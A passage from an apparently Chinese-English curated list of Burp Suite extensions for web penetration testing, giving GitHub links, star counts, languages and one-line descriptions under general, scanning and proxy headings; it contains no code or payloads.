[silentsignal/burp-image-size](https://github.com/silentsignal/burp-image-size) Image size issues plugin for Burp Suite - [**87**星][10m] [Java] [doyensec/burpdeveltraining](https://github.com/doyensec/burpdeveltraining) Material for the training "Developing Burp Suite Extensions – From Manual Testing to Security Automation" - [**83**星][1m] [Java] [jgillam/burp-paramalyzer](https://github.com/jgillam/burp-paramalyzer) Burp extension for parameter analysis of large-scale web application penetration tests. - [**83**星][1y] [Py] [nccgroup/blackboxprotobuf](https://github.com/nccgroup/blackboxprotobuf) Blackbox protobuf is a Burp Suite extension for decoding and modifying arbitrary protobuf messages without the protobuf type definition. - [**75**星][1y] [Java] [bit4woo/u2c](https://github.com/bit4woo/u2c) Unicode To Chinese -- U2C : A burpsuite Extender That Convert Unicode To Chinese 【Unicode编码转中文的burp插件】 - [**73**星][2y] [Java] [spiderlabs/burplay](https://github.com/spiderlabs/burplay) Burplay is a Burp Extension allowing for replaying any number of requests using same modifications definition. Its main purpose is to aid in searching for Privilege Escalation issues. - [**69**星][12d] [Java] [c0ny1/captcha-killer](https://github.com/c0ny1/captcha-killer) burp验证码识别接口调用插件 - [**65**星][2y] [Py] [markclayton/bumpster](https://github.com/markclayton/bumpster) The Unofficial Burp Extension for DNSDumpster.com - [**64**星][1y] [Java] [c0ny1/httpheadmodifer](https://github.com/c0ny1/httpheadmodifer) 一款快速修改HTTP数据包头的Burp Suite插件 - [**63**星][5m] [Java] [nccgroup/berserko](https://github.com/nccgroup/berserko) Burp Suite extension to perform Kerberos authentication - [**58**星][11m] [Java] [portswigger/replicator](https://github.com/portswigger/replicator) Burp extension to help developers replicate findings from pen tests - [**57**星][6y] [Java] [spiderlabs/burpnotesextension](https://github.com/spiderlabs/burpnotesextension) a plugin for Burp Suite that adds a Notes tab. The tool aims to better organize external files that are created during penetration testing. - [**51**星][1y] [Java] [netspi/burpextractor](https://github.com/netspi/burpextractor) A Burp extension for generic extraction and reuse of data within HTTP requests and responses. - [**48**星][2y] [Java] [inode-/attackselector](https://github.com/inode-/attackselector) Burp Suite Attack Selector Plugin - [**46**星][28d] [Java] [netspi/awssigner](https://github.com/netspi/awssigner) Burp Extension for AWS Signing - [**43**星][1y] [Py] [br3akp0int/gqlparser](https://github.com/br3akp0int/gqlparser) A repository for GraphQL Extension for Burp Suite - [**42**星][5m] [Py] [gh0stkey/jsonandhttpp](https://github.com/gh0stkey/JSONandHTTPP) Burp Suite Plugin to convert the json text that returns the body into HTTP request parameters. - [**40**星][6y] [Java] [wuntee/burpauthzplugin](https://github.com/wuntee/burpauthzplugin) Burp plugin to test for authorization flaws - [**39**星][11m] [Java] [tijme/similar-request-excluder](https://github.com/tijme/similar-request-excluder) A Burp Suite extension that automatically marks similar requests as 'out-of-scope'. - [**37**星][1y] [Java] [augustd/burp-suite-error-message-checks](https://github.com/augustd/burp-suite-error-message-checks) Burp Suite extension to passively scan for applications revealing server error messages - [**36**星][3y] [Py] [0ang3el/unsafe-jax-rs-burp](https://github.com/0ang3el/unsafe-jax-rs-burp) Burp Suite extension for JAX-RS - [**35**星][1y] [Java] [ikkisoft/blazer](https://github.com/ikkisoft/blazer) Burp Suite AMF Extension - [**35**星][11d] [Kotlin] [typeerror/bookmarks](https://github.com/typeerror/bookmarks) A Burp Suite Extension to take back your repeater tabs - [**34**星][5y] [Py] [dionach/headersanalyzer](https://github.com/dionach/headersanalyzer) Burp extension that checks for interesting and security headers - [**34**星][2y] [Py] [penafieljlm/burp-tracer](https://github.com/penafieljlm/burp-tracer) BurpSuite 扩展。获取当前的站点地图,提取每个请求参数,并搜索存在请求参数值的回复 - [**33**星][2y] [Java] [dnet/burp-oauth](https://github.com/dnet/burp-oauth) OAuth plugin for Burp Suite Extender - [**33**星][2m] [Java] [rub-nds/tls-attacker-burpextension](https://github.com/rub-nds/tls-attacker-burpextension) assist in the evaluation of TLS Server configurations with Burp Suite. - [**32**星][5y] [Java] [malerisch/burp-csj](https://github.com/malerisch/burp-csj) BurpCSJ extension for Burp Pro - Crawljax Selenium JUnit integration - [**32**星][7m] [Py] [portswigger/active-scan-plus-plus](https://github.com/portswigger/active-scan-plus-plus) ActiveScan++ Burp Suite Plugin - [**30**星][4y] [Py] [carstein/burp-extensions](https://github.com/carstein/burp-extensions) Automatically exported from code.google.com/p/burp-extensions - [**30**星][7y] [Py] [meatballs1/burp_jsbeautifier](https://github.com/meatballs1/burp_jsbeautifier) js-beautifier extension for Burp Suite - [**30**星][4m] [Py] [portswigger/js-link-finder](https://github.com/portswigger/js-link-finder) Burp Extension for a passive scanning JS files for endpoint links. - [**29**星][8m] [Java] [hvqzao/burp-flow](https://github.com/hvqzao/burp-flow) Extension providing view with filtering capabilities for both complete and incomplete requests from all burp tools. - [**26**星][10m] [Kotlin] [gosecure/burp-ntlm-challenge-decoder](https://github.com/gosecure/burp-ntlm-challenge-decoder) Burp extension to decode NTLM SSP headers and extract domain/host information - [**24**星][2y] [Py] [portswigger/burp-smart-buster](https://github.com/portswigger/burp-smart-buster) A Burp Suite content discovery plugin that add the smart into the Buster! - [**24**星][3y] [Py] [silentsignal/activescan3plus](https://github.com/silentsignal/activescan3plus) Modified version of ActiveScan++ Burp Suite extension - [**23**星][2y] [Py] [aur3lius-dev/spydir](https://github.com/aur3lius-dev/spydir) BurpSuite extension to assist with Automated Forced Browsing/Endpoint Enumeration - [**23**星][5m] [Py] [elespike/burp-cph](https://github.com/elespike/burp-cph) Custom Parameter Handler extension for Burp Suite. - [**23**星][2y] [Ruby] [zidekmat/graphql_beautifier](https://github.com/zidekmat/graphql_beautifier) Burp Suite extension to help make Graphql request more readable - [**22**星][8m] [Java] [silentsignal/burp-requests](https://github.com/silentsignal/burp-requests) Copy as requests plugin for Burp Suite - [**21**星][2y] [Py] [unamer/ctfhelper](https://github.com/unamer/ctfhelper) A simple Burp extension for scanning stuffs in CTF - [**20**星][3y] [Ruby] [kingsabri/burp_suite_extension_ruby](https://github.com/kingsabri/burp_suite_extension_ruby) BurpSuite Extension Ruby Template to speed up building a Burp Extension using Ruby - [**20**星][3y] [Py] [securitymb/burp-exceptions](https://github.com/securitymb/burp-exceptions) Simple trick to increase readability of exceptions raised by Burp extensions written in Python - [**19**星][8m] [Java] [hvqzao/burp-wildcard](https://github.com/hvqzao/burp-wildcard) Burp extension intended to compact Burp extension tabs by hijacking them to own tab. - [**19**星][5y] [Java] [nccgroup/wcfdser-ngng](https://github.com/nccgroup/wcfdser-ngng) A Burp Extender plugin, that will make binary soap objects readable and modifiable. - [**18**星][4m] [Java] [augustd/burp-suite-software-version-checks](https://github.com/augustd/burp-suite-software-version-checks) Burp extension to passively scan for applications revealing software version numbers - [**17**星][2m] [Java] [phefley/burp-javascript-security-extension](https://github.com/phefley/burp-javascript-security-extension) A Burp Suite extension which performs checks for cross-domain scripting against the DOM, subresource integrity checks, and evaluates JavaScript resources against threat intelligence data. - [**17**星][7m] [Py] [yeswehack/yesweburp](https://github.com/yeswehack/yesweburp) YesWeHack Api Extension for Burp - [**15**星][4y] [Java] [shengqi158/rsa-crypto-burp-extention](https://github.com/shengqi158/rsa-crypto-burp-extention) burp 插件 用于RSA 数据包加解密 - [**15**星][10m] [Java] [twelvesec/jdser-dcomp](https://github.com/twelvesec/jdser-dcomp) A Burp Extender plugin that will allow you to tamper with requests containing compressed, serialized java objects. - [**15**星][1y] [Py] [portswigger/nginx-alias-traversal](https://github.com/portswigger/nginx-alias-traversal) Burp extension to detect alias traversal via NGINX misconfiguration at scale. - [**14**星][3y] [JS] [rinetd/burpsuite-1](https://github.com/rinetd/burpsuite-1) BurpSuite using the document and some extensions - [**13**星][5y] [Py] [enablesecurity/identity-crisis](https://github.com/enablesecurity/identity-crisis) A Burp Suite extension that checks if a particular URL responds differently to various User-Agent headers - [**13**星][7m] [Py] [modzero/burp-responseclusterer](https://github.com/modzero/burp-responseclusterer) Burp plugin that clusters responses to show an overview of received responses - [**13**星][1y] [Java] [moeinfatehi/admin-panel_finder](https://github.com/moeinfatehi/admin-panel_finder) A burp suite extension that enumerates infrastructure and application admin interfaces (OTG-CONFIG-005) - [**13**星][7m] [Py] [solomonsklash/sri-check](https://github.com/SolomonSklash/sri-check) A Burp Suite extension for identifying missing Subresource Integrity attributes. - [**12**星][3m] [Java] [augustd/burp-suite-utils](https://github.com/augustd/burp-suite-utils) Utilities for creating Burp Suite Extensions. - [**12**星][5y] [Java] [federicodotta/burpjdser-ng-edited](https://github.com/federicodotta/burpjdser-ng-edited) Burp Suite plugin that allow to deserialize Java objects and convert them in an XML format. Unpack also gzip responses. Based on BurpJDSer-ng of omercnet. - [**12**星][7y] [Py] [infodel/burp.extension-googlehack](https://github.com/infodel/burp.extension-googlehack) Burp Suite Extension providing Google Hacking Interface - [**11**星][2y] [Ruby] [crashgrindrips/burp-dump](https://github.com/crashgrindrips/burp-dump) A Burp plugin to dump HTTP(S) requests/responses to a file system - [**11**星][6y] [Py] [faffi/curlit](https://github.com/faffi/curlit) Burp plugin to turn requests into curl commands - [**11**星][3y] [Java] [h3xstream/burp-image-metadata](https://github.com/h3xstream/burp-image-metadata) Burp and ZAP plugin that display image metadata (JPEG Exif or PNG text chunk). - [**11**星][2y] [Java] [hvqzao/burp-token-rewrite](https://github.com/hvqzao/burp-token-rewrite) Burp extension for automated handling of CSRF tokens - [**11**星][2y] [Java] [portswigger/attack-selector](https://github.com/portswigger/attack-selector) Burp Suite Attack Selector Plugin - [**11**星][7m] [Java] [portswigger/copy-as-python-requests](https://github.com/portswigger/copy-as-python-requests) Copy as requests plugin for Burp Suite - [**11**星][6y] [Py] [smeegesec/wsdlwizard](https://github.com/smeegesec/wsdlwizard) WSDL Wizard is a Burp Suite plugin written in Python to detect current and discover new WSDL (Web Service Definition Language) files. - [**11**星][4y] [Java] [monikamorrow/burp-suite-extension-examples](https://github.com/monikamorrow/Burp-Suite-Extension-Examples) Burp Suite starter example projects. - [**10**星][2y] [HTML] [adriancitu/burp-tabnabbing-extension](https://github.com/adriancitu/burp-tabnabbing-extension) Burp Suite Professional extension in Java for Tabnabbing attack - [**10**星][6y] [Java] [xxux11/burpheartbleedextension](https://github.com/xxux11/burpheartbleedextension) Burp Heartbleed Extension - [**10**星][2y] [Java] [c0ny1/burp-cookie-porter](https://github.com/c0ny1/burp-cookie-porter) 一个可快速“搬运”cookie的Burp Suite插件 - [**10**星][2y] [Java] [portswigger/kerberos-authentication](https://github.com/portswigger/kerberos-authentication) Burp Suite extension to perform Kerberos authentication - [**9**星][5y] [Java] [allfro/dotnetbeautifier](https://github.com/allfro/dotnetbeautifier) A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE). - [**9**星][4y] [Java] [augustd/burp-suite-gwt-scan](https://github.com/augustd/burp-suite-gwt-scan) Burp Suite plugin identifies insertion points for GWT (Google Web Toolkit) requests - [**9**星][7m] [Py] [defectdojo/burp-plugin](https://github.com/defectdojo/burp-plugin) A Burp plugin to export findings to DefectDojo - [**9**星][1y] [Java] [sampsonc/authheaderupdater](https://github.com/sampsonc/authheaderupdater) Burp extension to specify the token value for the Authenication header while scanning. - [**9**星][2y] [Java] [aoncyberlabs/fastinfoset-burp-plugin](https://github.com/AonCyberLabs/FastInfoset-Burp-Plugin) Burp plugin to convert fast infoset (FI) to/from the text-based XML document format allowing easy editing - [**8**星][2y] [Py] [bao7uo/waf-cookie-fetcher](https://github.com/bao7uo/waf-cookie-fetcher) WAF Cookie Fetcher is a Burp Suite extension written in Python, which uses a headless browser to obtain the values of WAF-injected cookies which are calculated in the browser by client-side JavaScript code and adds them to Burp's cookie jar. Requires PhantomJS. - [**8**星][6y] [Java] [cyberisltd/post2json](https://github.com/cyberisltd/post2json) Burp Suite Extension to convert a POST request to JSON message, moving any .NET request verification token to HTTP headers if present - [**8**星][3y] [Java] [eonlight/burpextenderheaderchecks](https://github.com/eonlight/burpextenderheaderchecks) A Burp Suite Extension that adds Header Checks and other helper functionalities - [**8**星][2y] [Java] [rammarj/csrf-poc-creator](https://github.com/rammarj/csrf-poc-creator) A Burp Suite extension for CSRF proof of concepts. - [**8**星][5m] [Py] [fsecurelabs/timeinator](https://github.com/FSecureLABS/timeinator) Timeinator is an extension for Burp Suite that can be used to perform timing attacks over an unreliable network such as the internet. - [**7**星][3y] [Java] [dibsy/staticanalyzer](https://github.com/dibsy/staticanalyzer) StaticAnalyzer is a burp plugin that can be used to perform static analysis of the response information from server during run time. It will search for specific words in the response that is mentioned in the vectors.txt - [**7**星][3y] [Ruby] [dradis/burp-dradis](https://github.com/dradis/burp-dradis) Dradis Framework extension for Burp Suite - [**7**星][3y] [Java] [fruh/extendedmacro](https://github.com/fruh/extendedmacro) ExtendedMacro - BurpSuite plugin providing extended macro functionality - [**7**星][1y] [Java] [pajswigger/add-request-to-macro](https://github.com/pajswigger/add-request-to-macro) Burp extension to add a request to a macro - [**7**星][2y] [Java] [yehgdotnet/burp-extention-bing-translator](https://github.com/yehgdotnet/burp-extention-bing-translator) Burp Plugin - Bing Translator - [**6**星][3m] [Java] [aress31/copy-as-powershell-requests](https://github.com/aress31/copy-as-powershell-requests) Copy as PowerShell request(s) plugin for Burp Suite (approved by PortSwigger for inclusion in their official BApp Store). - [**6**星][1m] [Java] [aress31/googleauthenticator](https://github.com/aress31/googleauthenticator) Burp Suite plugin that dynamically generates Google 2FA codes for use in session handling rules (approved by PortSwigger for inclusion in their official BApp Store). - [**6**星][3m] [Java] [lorenzog/burpaddcustomheader](https://github.com/lorenzog/burpaddcustomheader) A Burp Suite extension to add a custom header (e.g. JWT) - [**6**星][2y] [Py] [maxence-schmitt/officeopenxmleditor](https://github.com/maxence-schmitt/officeopenxmleditor) Burp extension that add a tab to edit Office Open XML document (xlsx,docx,pptx) - [**6**星][2y] [Java] [silentsignal/burp-uniqueness](https://github.com/silentsignal/burp-uniqueness) Uniqueness plugin for Burp Suite - [**6**星][2y] [Java] [stackcrash/burpheaders](https://github.com/stackcrash/burpheaders) Burp extension for checking optional headers - [**6**星][5m] [Java] [augustd/burp-suite-jsonpath](https://github.com/augustd/burp-suite-jsonpath) JSONPath extension for BurpSuite - [**6**星][7m] [Java] [denniskniep/gqlraider](https://github.com/denniskniep/gqlraider) GQL Burp Extension - [**6**星][2m] [Java] [neal1991/r-forwarder-burp](https://github.com/neal1991/r-forwarder-burp) The burp extension to forward the request - [**5**星][6y] [Java] [eganist/burp-issue-poster](https://github.com/eganist/burp-issue-poster) This Burp Extension is intended to post to a service the details of an issue found either by active or passive scanning - [**5**星][3y] [Py] [floyd-fuh/burp-collect500](https://github.com/floyd-fuh/burp-collect500) Burp plugin that collects all HTTP 500 messages - [**5**星][7y] [Py] [mwielgoszewski/jython-burp-extensions](https://github.com/mwielgoszewski/jython-burp-extensions) Jython burp extensioins - [**5**星][2m] [Java] [iamaldi/rapid](https://github.com/iamaldi/rapid) Rapid is a Burp extension that enables you to save HTTP Request / Response to file in a user friendly text format a lot faster. - [**5**星][22d] [Ruby] [dradis/dradis-burp](https://github.com/dradis/dradis-burp) Burp Suite plugin for the Dradis Framework - [**5**星][27d] [Java] [parsiya/bug-diaries](https://github.com/parsiya/bug-diaries) A extension for Burp's free edition that mimics the pro edition's custom scan issues. - [**4**星][6y] [Perl] [allfro/browserrepeater](https://github.com/allfro/browserrepeater) BurpSuite extension for Repeater tool that renders responses in a real browser. - [**4**星][2y] [Java] [dannegrea/tokenjar](https://github.com/dannegrea/tokenjar) Burp Suite extension. Useful for managing tokens like anti-CSRF, CSurf, Session values. Can be used to set params that require random numbers or params that are computed based on application response. - [**4**星][2y] [Java] [pentestpartners/fista](https://github.com/pentestpartners/fista) A Burp Extender plugin allowing decoding of fastinfoset encoded communications. - [**4**星][3y] [Java] [jksecurity/burp_savetofile](https://github.com/jksecurity/burp_savetofile) BurpSuite plugin to save just the body of a request or response to a file - [**3**星][2y] [Py] [externalist/aes-encrypt-decrypt-burp-extender-plugin-example](https://github.com/externalist/aes-encrypt-decrypt-burp-extender-plugin-example) A POC burp extender plugin to seamlessly decrypt/encrypt encrypted HTTP network traffic. - [**3**星][9m] [Java] [raise-isayan/bigipdiscover](https://github.com/raise-isayan/bigipdiscover) It becomes the extension of Burp suite. The cookie set by the BipIP server may include a private IP, which is an extension to detect that IP - [**3**星][2y] [Py] [snoopysecurity/noopener-burp-extension](https://github.com/snoopysecurity/noopener-burp-extension) Find Target="_blank" values within web pages that are set without 'noopener' and 'noreferrer' attributes - [**3**星][3y] [Py] [vergl4s/signatures](https://github.com/vergl4s/signatures) Length extension attacks in Burp Suite - [**3**星][3y] [Java] [cnotin/burp-scan-manual-insertion-point](https://github.com/cnotin/burp-scan-manual-insertion-point) Burp Suite Pro extension - [**3**星][3m] [Java] [wrvenkat/burp-multistep-csrf-poc](https://github.com/wrvenkat/burp-multistep-csrf-poc) Burp extension to generate multi-step CSRF POC. - [**3**星][3m] [Java] [augustd/burp-suite-swaggy](https://github.com/augustd/burp-suite-swaggy) Burp Suite extension for parsing Swagger web service definition files - [**3**星][7m] [Py] [solomonsklash/cookie-decrypter](https://github.com/solomonsklash/cookie-decrypter) A Burp Suite Professional extension for decrypting/decoding various types of cookies. - [**2**星][2y] [Java] [alexlauerman/incrementmeplease](https://github.com/alexlauerman/incrementmeplease) Burp extension to increment a parameter in each active scan request - [**2**星][4y] [Py] [d453d2/burp-jython-console](https://github.com/d453d2/burp-jython-console) Burp Suite extension to enable a Jython console - origin ( - [**2**星][1y] [Java] [matanatr96/decoderproburpsuite](https://github.com/matanatr96/decoderproburpsuite) Burp Suite Plugin to decode and clean up garbage response text - [**2**星][3y] [Java] [silentsignal/burp-json-array](https://github.com/silentsignal/burp-json-array) JSON Array issues plugin for Burp Suite - [**2**星][2y] [stayliv3/burpsuite-magic](https://github.com/stayliv3/burpsuite-magic) 收集burpsuite插件,并对每个插件编写使用说明手册。 - [**2**星][2y] [Ruby] [thec00n/uploader](https://github.com/thec00n/uploader) Burp extension to test for directory traversal attacks in insecure file uploads - [**2**星][8y] [Java] [thecao365/burp-suite-beautifier-extension](https://github.com/thecao365/burp-suite-beautifier-extension) burp-suite-beautifier-extension - [**2**星][28d] [Java] [parsiya/burp-sample-extension-java](https://github.com/parsiya/burp-sample-extension-java) Sample Burp Extension in Java - [**1**星][7m] [Java] [bort-millipede/burp-batch-report-generator](https://github.com/bort-millipede/burp-batch-report-generator) Small Burp Suite Extension to generate multiple scan reports by host with just a few clicks. Works with Burp Suite Professional only. - [**1**星][28d] [Java] [infobyte/faraday_burp](https://github.com/infobyte/faraday_burp) Faraday Burp Extension - [**1**星][9m] [Java] [jonluca/burp-copy-as-node](https://github.com/jonluca/burp-copy-as-node) Burp extension to copy a request as a node.js requests function - [**1**星][2y] [Java] [moradotai/cms-scan](https://github.com/moradotai/cms-scan) An active scan extension for Burp that provides supplemental coverage when testing popular content management systems. - [**1**星][3y] [Java] [tagomaru/burp-extension-sync-parameter](https://github.com/tagomaru/burp-extension-sync-parameter) an extension to Burp Suite that provides a sync function for CSRF token parameter. - [**1**星][3m] [Py] [bomsi/blockerlite](https://github.com/bomsi/blockerlite) Simple Burp extension to drop blacklisted hosts - [**1**星][4y] [Py] [hvqzao/burp-csrf-handling](https://github.com/hvqzao/burp-csrf-handling) CSRF tokens handling Burp extension - [**1**星][1m] [Java] [sunny0day/burp-auto-drop](https://github.com/sunny0day/burp-auto-drop) Burp extension to automatically drop requests that match a certain regex. - [**0**星][3y] [Java] [chris-atredis/burpchat](https://github.com/chris-atredis/burpchat) burpChat is a BurpSuite plugin that enables collaborative BurpSuite usage using XMPP/Jabber. - [**0**星][2y] [Java] [insighti/burpamx](https://github.com/insighti/burpamx) AMX Authorization Burp Suite Extension - [**0**星][9m] [Java] [xorrbit/burp-nessusloader](https://github.com/xorrbit/burp-nessusloader) Burp Suite extension to import detected web servers from a Nessus scan xml file (.nessus) *** ## <a id="90339d9a130e105e1617bff2c2ca9721"></a>漏洞&&扫描 - [**663**星][10m] [Java] [vulnerscom/burp-vulners-scanner](https://github.com/vulnerscom/burp-vulners-scanner) Burp扫描插件,基于vulners.com搜索API - [**510**星][2m] [Java] [wagiro/burpbounty](https://github.com/wagiro/burpbounty) is a extension of Burp Suite that allows you, in a quick and simple way, to improve the active and passive scanner by means of personalized rules through a very intuitive graphical interface. - [**395**星][2y] [Java] [federicodotta/java-deserialization-scanner](https://github.com/federicodotta/java-deserialization-scanner) All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities - [**225**星][6m] [Perl] [modzero/mod0burpuploadscanner](https://github.com/modzero/mod0burpuploadscanner) HTTP file upload scanner for Burp Proxy - [**186**星][1y] [Perl] [portswigger/upload-scanner](https://github.com/portswigger/upload-scanner) HTTP file upload scanner for Burp Proxy - [**136**星][22d] [JS] [h3xstream/burp-retire-js](https://github.com/h3xstream/burp-retire-js) Burp/ZAP/Maven extension that integrate Retire.js repository to find vulnerable Javascript libraries. - [**128**星][2y] [Java] [yandex/burp-molly-scanner](https://github.com/yandex/burp-molly-scanner) Turn your Burp suite into headless active web application vulnerability scanner - [**101**星][2y] [Java] [spiderlabs/airachnid-burp-extension](https://github.com/spiderlabs/airachnid-burp-extension) A Burp Extension to test applications for vulnerability to the Web Cache Deception attack - [**85**星][4m] [Py] [kapytein/jsonp](https://github.com/kapytein/jsonp) a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies. - [**81**星][9m] [Py] [nccgroup/argumentinjectionhammer](https://github.com/nccgroup/argumentinjectionhammer) A Burp Extension designed to identify argument injection vulnerabilities. - [**75**星][4y] [Java] [directdefense/superserial](https://github.com/directdefense/superserial) SuperSerial - Burp Java Deserialization Vulnerability Identification - [**74**星][4y] [Py] [integrissecurity/carbonator](https://github.com/integrissecurity/carbonator) The Burp Suite Pro extension that automates scope, spider & scan from the command line. - [**59**星][1y] [Py] [capt-meelo/telewreck](https://github.com/capt-meelo/telewreck) A Burp extension to detect and exploit versions of Telerik Web UI vulnerable to CVE-2017-9248. - [**58**星][3y] [Java] [vulnerscom/burp-dirbuster](https://github.com/vulnerscom/burp-dirbuster) Dirbuster plugin for Burp Suite - [**57**星][3y] [Java] [linkedin/sometime](https://github.com/linkedin/sometime) A BurpSuite plugin to detect Same Origin Method Execution vulnerabilities - [**56**星][2y] [Java] [bigsizeme/burplugin-java-rce](https://github.com/bigsizeme/burplugin-java-rce) Burp plugin, Java RCE - [**46**星][2y] [Java] [portswigger/httpoxy-scanner](https://github.com/portswigger/httpoxy-scanner) A Burp Suite extension that checks for the HTTPoxy vulnerability. - [**42**星][2y] [Py] [modzero/interestingfilescanner](https://github.com/modzero/interestingfilescanner) Burp extension - [**39**星][3y] [Java] [directdefense/superserial-active](https://github.com/directdefense/superserial-active) SuperSerial-Active - Java Deserialization Vulnerability Active Identification Burp Extender - [**38**星][1y] [Py] [luh2/detectdynamicjs](https://github.com/luh2/detectdynamicjs) The DetectDynamicJS Burp Extension provides an additional passive scanner that tries to find differing content in JavaScript files and aid in finding user/session data. - [**35**星][4m] [Py] [arbazkiraak/burpblh](https://github.com/arbazkiraak/burpblh) 使用IScannerCheck发现被劫持的损坏链接. Burp插件 - [**34**星][4y] [Py] [politoinc/yara-scanner](https://github.com/politoinc/yara-scanner) Yara intergrated into BurpSuite - [**34**星][3y] [Py] [thomaspatzke/burp-sessionauthtool](https://github.com/thomaspatzke/burp-sessionauthtool) Burp plugin which supports in finding privilege escalation vulnerabilities - [**29**星][2y] [Py] [portswigger/wordpress-scanner](https://github.com/portswigger/wordpress-scanner) Find known vulnerabilities in WordPress plugins and themes using Burp Suite proxy. WPScan like plugin for Burp. - [**29**星][7m] [Java] [portswigger/scan-check-builder](https://github.com/portswigger/scan-check-builder) Burp Bounty is a extension of Burp Suite that improve an active and passive scanner by yourself. This extension requires Burp Suite Pro. - [**25**星][2y] [Java] [vankyver/burp-vulners-scanner](https://github.com/vankyver/burp-vulners-scanner) Burp scanner plugin based on Vulners.com vulnerability database - [**25**星][6y] [Py] [opensecurityresearch/custompassivescanner](https://github.com/opensecurityresearch/custompassivescanner) A Custom Scanner for Burp - [**23**星][3y] [Java] [vah13/burpcrlfplugin](https://github.com/vah13/burpcrlfplugin) Another plugin for CRLF vulnerability detection - [**22**星][9m] [BitBake] [ghsec/bbprofiles](https://github.com/ghsec/bbprofiles) Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that improve an active and passive scanner by yourself. This extension requires Burp Suite Pro. - [**21**星][3y] [Py] [f-secure/headless-scanner-driver](https://github.com/f-secure/headless-scanner-driver) A Burp Suite extension that starts scanning on requests it sees, and dumps results on standard output - [**20**星][3m] [Java] [aress31/flarequench](https://github.com/aress31/flarequench) Burp Suite plugin that adds additional checks to the passive scanner to reveal the origin IP(s) of Cloudflare-protected web applications. - [**19**星][2m] [Java] [mirfansulaiman/customheader](https://github.com/mirfansulaiman/customheader) This Burp Suite extension allows you to customize header with put a new header into HTTP REQUEST BurpSuite (Scanner, Intruder, Repeater, Proxy History) - [**18**星][4y] [codewatchorg/burp-yara-rules](https://github.com/codewatchorg/burp-yara-rules) Yara rules to be used with the Burp Yara-Scanner extension - [**18**星][6m] [Java] [thomashartm/burp-aem-scanner](https://github.com/thomashartm/burp-aem-scanner) Burp Scanner extension to fingerprint and actively scan instances of the Adobe Experience Manager CMS. It checks the website for common misconfigurations and security holes. - [**16**星][1y] [Py] [portswigger/additional-scanner-checks](https://github.com/portswigger/additional-scanner-checks) Collection of scanner checks missing in Burp - [**14**星][3y] [Java] [portswigger/same-origin-method-execution](https://github.com/portswigger/same-origin-method-execution) A BurpSuite plugin to detect Same Origin Method Execution vulnerabilities - [**13**星][1y] [Py] [thomaspatzke/burp-missingscannerchecks](https://github.com/thomaspatzke/burp-missingscannerchecks) Collection of scanner checks missing in Burp - [**12**星][2y] [Java] [ah8r/csrf](https://github.com/ah8r/csrf) CSRF Scanner Extension for Burp Suite Pro - [**10**星][4y] [Java] [augustd/burp-suite-token-fetcher](https://github.com/augustd/burp-suite-token-fetcher) Burp Extender to add unique form tokens to scanner requests. - [**10**星][1y] [Py] [portswigger/detect-dynamic-js](https://github.com/portswigger/detect-dynamic-js) The DetectDynamicJS Burp Extension provides an additional passive scanner that tries to find differing content in JavaScript files and aid in finding user/session data. - [**10**星][3y] [Java] [ring04h/java-deserialization-scanner](https://github.com/ring04h/java-deserialization-scanner) All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities - [**10**星][2y] [Java] [securifybv/phpunserializecheck](https://github.com/securifybv/phpunserializecheck) PHP Unserialize Check - Burp Scanner Extension - [**10**星][23d] [Java] [veggiespam/imagelocationscanner](https://github.com/veggiespam/imagelocationscanner) Scan for GPS location exposure in images with this Burp & ZAP plugin. - [**7**星][3y] [Py] [luh2/pdfmetadata](https://github.com/luh2/pdfmetadata) The PDF Metadata Burp Extension provides an additional passive Scanner check for metadata in PDF files. - [**4**星][4y] [Ruby] [blazeinfosec/activeevent](https://github.com/blazeinfosec/activeevent) ActiveEvent is a Burp plugin that integrates Burp Scanner and Splunk events - [**4**星][2y] [Java] [codedx/burp-extension](https://github.com/codedx/burp-extension) Burp Suite plugin to send data to Code Dx software vulnerability management system - [**2**星][3y] [Java] [moeinfatehi/cvss_calculator](https://github.com/moeinfatehi/cvss_calculator) CVSS Calculator - a burp suite extension for calculating CVSS v2 and v3 scores of vulnerabilities. - [**2**星][6y] [Java] [thec00n/dradis-vuln-table](https://github.com/thec00n/dradis-vuln-table) Dradis Vuln Table extension for Burp suite - [**1**星][1y] [Java] [logicaltrust/burpexiftoolscanner](https://github.com/logicaltrust/burpexiftoolscanner) Burp extension, reads metadata using ExifTool - [**1**星][2y] [Java] [rammarj/burp-header-injector](https://github.com/rammarj/burp-header-injector) Burp Free plugin to test for host header injection vulnerabilities. (Development) - [**1**星][9m] [Py] [jamesm0rr1s/burpsuite-add-and-track-custom-issues](https://github.com/jamesm0rr1s/BurpSuite-Add-and-Track-Custom-Issues) Add & Track Custom Issues is a Burp Suite extension that allows users to add and track manual findings that the automated scanner was unable to identify. *** ## <a id="280b7fad90dd1238909425140c788365"></a>代理 - [**912**星][3y] [Java] [summitt/burp-non-http-extension](https://github.com/summitt/burp-non-http-extension) Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite. - [**303**星][15d] [Java] [ilmila/j2eescan](https://github.com/ilmila/j2eescan) a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications. - [**250**星][2y] [Java] [portswigger/collaborator-everywhere](https://github.com/portswigger/collaborator-everywhere) Burp Suite 扩展,通过注入非侵入性 headers 来增强代理流量,通过引起 Pingback 到 Burp Collaborator 来揭露后端系统 - [**150**星][5m] [Py] [kacperszurek/burp_wp](https://github.com/kacperszurek/burp_wp) Find known vulnerabilities in WordPress plugins and themes using Burp Suite proxy. WPScan like plugin for Burp. - [**88**星][6m] [Java] [rub-nds/burpssoextension](https://github.com/rub-nds/burpssoextension) An extension for BurpSuite that highlights SSO messages in Burp's proxy window.. - [**73**星][8m] [Py] [jiangsir404/pbscan](https://github.com/jiangsir404/pbscan) 基于burpsuite headless 的代理式被动扫描系统 - [**66**星][2m] [Java] [static-flow/burpsuite-team-extension](https://github.com/static-flow/burpsuite-team-extension) This Burpsuite plugin allows for multiple web app testers to share their proxy history with each other in real time. Requests that comes through your Burpsuite instance will be replicated in the history of the other testers and vice-versa! - [**49**星][2y] [Py] [mrschyte/socksmon](https://github.com/mrschyte/socksmon) 使用 BURP 或 ZAP 的 TCP 拦截代理 - [**33**星][4y] [Py] 